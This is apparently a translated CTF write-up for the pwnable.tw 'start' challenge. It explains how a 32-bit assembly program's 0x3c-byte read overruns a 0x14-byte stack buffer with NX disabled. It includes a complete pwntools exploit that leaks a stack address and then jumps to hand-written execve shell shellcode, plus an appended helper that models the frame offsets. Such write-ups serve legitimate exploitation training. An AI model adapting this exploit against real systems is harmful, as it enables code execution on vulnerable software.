pwnable start
2022-06-10 18:04:00 【amazh】
If there is something you don't understand, you can ask in the comment area; I will answer when I see it.
After getting the attachment, run checksec on it:

It is a 32-bit program with no protections enabled. Opening it in IDA shows only two functions, _start and _exit. This challenge is not compiled from C source; the program itself is written in assembly:

Let's look at the assembly code.
The general flow is: first push esp and the address of the exit function onto the stack, then push the strings. We can run the program first:
The five push instructions in the middle are the strings being pushed.
Then a write system call prints these strings, and a read system call lets the user enter data:
write outputs 0x14 bytes of characters, and read accepts 0x3c bytes.
During a system call the value of esp does not change; we can also confirm this with dynamic debugging in gdb.
At the end of the function comes add esp, 14h; ret. Before this executes, the stack layout looks like this:
After add esp, 0x14, esp points to the address of the exit function, and ret then executes exit. That is the execution flow of the whole function.
The vulnerability in this challenge is also obvious: in the read system call, 0x3c bytes of data are read, so we can overwrite the address of the exit function. Moreover, NX protection is not enabled, so the stack is executable. The general exploitation process is therefore: overwrite the exit() function address sitting in the ret slot, leak a stack address, then write shellcode onto the stack
and overwrite the return address again with the address of the shellcode. That's all. Note that the shellcode generated by pwntools is 44 bytes, while the shellcode we can write is 0x3C - 0x14 = 40 bytes, so it is recommended to write it by hand or look it up on a relevant shellcode site.
The exp is as follows:

```python
from pwn import *

p = process("./start")
e = ELF("./start")
context.log_level = 'debug'
#p = remote("chall.pwnable.tw",1000)
context.arch = "i386"
#gdb.debug(e.path,'b _start')
# Hand-written 24-byte execve("/bin//sh") shellcode; the default pwntools one (44 bytes) is too long.
shellcode = asm("xor ecx,ecx;xor edx,edx ; push edx;push 0x68732f6e;push 0x69622f2f; mov ebx,esp;mov eax,0xb;int 0x80 ")
write_addr = 0x8048087  # address of the code that performs the write syscall (prints 0x14 bytes from esp)
# Stage 1: fill the 0x14-byte buffer and overwrite the exit address with write_addr,
# so the write syscall prints from esp and leaks a stack address.
payload1 = b"a" * 0x14 + p32(write_addr)   # bytes literals: p32() returns bytes on Python 3
p.sendafter(b":", payload1)
stack_addr = u32(p.recv(4))
log.success("stack_addr:" + hex(stack_addr))
# Stage 2: overwrite the return address with the location of the shellcode, which
# follows the return slot and lands at stack_addr + 0x14.
payload2 = b'a' * 0x14 + p32(stack_addr + 0x14) + shellcode
p.send(payload2)
p.interactive()
```
After the first payload is sent, the stack layout is as follows:

After the second payload is sent, the stack layout is as follows:

That's about it!
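As an added example (not part of the original write-up), the following Python models the frame arithmetic described above: how far the 0x3c-byte read overruns the 0x14-byte buffer, why the 44-byte pwntools shellcode does not fit in a single read while the hand-written one does, and where bytes placed after the return slot land relative to the leaked esp. The constants come from the write-up; the function names and the sample leak bytes are my own.

```python
import struct

# Frame constants taken from the write-up (pwnable.tw "start", i386):
BUF_SIZE = 0x14        # bytes the write syscall prints; the saved return slot follows them
READ_SIZE = 0x3c       # bytes the read syscall accepts into the same stack area
WORD = 4               # i386 pointer size
PWNTOOLS_SH_LEN = 44   # length of the default pwntools shellcode, as stated in the write-up
HAND_SH_LEN = 24       # hand-counted encoded length of the write-up's eight-instruction shellcode


def overflow_budget(buf_size=BUF_SIZE, read_size=READ_SIZE):
    """Return (ret_offset, room): where the saved return address begins and how many
    bytes of the read land above that slot. ret_offset is None if the read is too
    short to reach the slot at all (the 'no overflow' case)."""
    if read_size < buf_size + WORD:
        return None, 0
    return buf_size, read_size - buf_size - WORD


def shellcode_fits(shellcode_len, buf_size=BUF_SIZE, read_size=READ_SIZE):
    """True if shellcode_len bytes fit after the return slot within a single read.
    The write-up's 0x3C - 0x14 = 40 bytes include the 4-byte return slot itself."""
    _, room = overflow_budget(buf_size, read_size)
    return shellcode_len <= room


def parse_leak(data):
    """Decode the 4-byte little-endian esp value that the redirected write prints.
    A short read is a real failure mode: report it instead of treating it as zero."""
    if len(data) < WORD:
        raise ValueError("short leak: need %d bytes, got %d" % (WORD, len(data)))
    return struct.unpack("<I", data[:WORD])[0]


def shellcode_addr(leaked_esp, buf_size=BUF_SIZE):
    """Address where bytes placed right after the return slot of the second read end up.
    The leaked value is the esp saved by 'push esp' at entry, which is WORD bytes above
    the slot the second read starts at, so the offset reduces to buf_size (0x14)."""
    return leaked_esp + buf_size


def frame_layout(shellcode_len, buf_size=BUF_SIZE, read_size=READ_SIZE):
    """Describe the second-stage input as (label, offset, length) tuples, or raise
    if it would not fit in one read."""
    ret_offset, room = overflow_budget(buf_size, read_size)
    if ret_offset is None or shellcode_len > room:
        raise ValueError("payload needs %d bytes but read takes %d"
                         % (buf_size + WORD + shellcode_len, read_size))
    return [("padding", 0, buf_size), ("ret", ret_offset, WORD),
            ("shellcode", ret_offset + WORD, shellcode_len)]
```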